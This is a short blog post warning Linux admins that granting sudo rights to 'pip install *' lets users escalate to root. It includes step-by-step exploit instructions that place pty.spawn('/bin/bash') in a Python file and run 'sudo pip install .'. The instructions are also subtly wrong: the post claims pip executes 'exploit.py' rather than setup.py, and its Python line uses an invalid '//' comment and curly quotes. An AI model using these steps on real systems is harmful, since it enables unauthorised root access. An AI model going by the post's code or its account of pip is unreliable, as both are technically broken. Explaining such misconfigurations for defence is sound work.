Little mistake that kills

Hi All,

Today I am writting about a small mistake that system admin might do in configuring their linux system.

As usuall, After the admin configure the system they will give certain priviledge to the user to run certain command that enable to run as admin that we call it sudo. But sometimes the admin is not really careful that in order to enable let the user not bugging them too much then they just enable anything that user need without any security risk analyses.

There are alot of sudo execution that actually cannot be just given to the user because by using that command they can escalate to certain level that endanger the system

Below is one of the command that is danger to be given to the user using sudo

(root) /usr/bin/pip install *

the above command is installation manager for python package, this usually give by the admin to enable the developer user to install they addition python packages. So what is the deal ? with that command give, the user could use sudo pip <malicious_command> to do the priviledge escalation by installing malicious script

Lest do the exploitation. create a python script called exploit.py in a directory just like the below script

import pty
pty.spawn(“/bin/bash”) //create a spawn shell

and save it.

after that you can run in the directory with this command

sudo pip install .

the pip install will execute the exploit.py and run the command in the file which spawn a shell

Since the script is run in the priviledge of root then the shell that just spawned is in the root context

Soo .. now you have escallated to root.

Easy right..

This kind of mistake is just very radicolous … usually done by the lazy admin .. 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s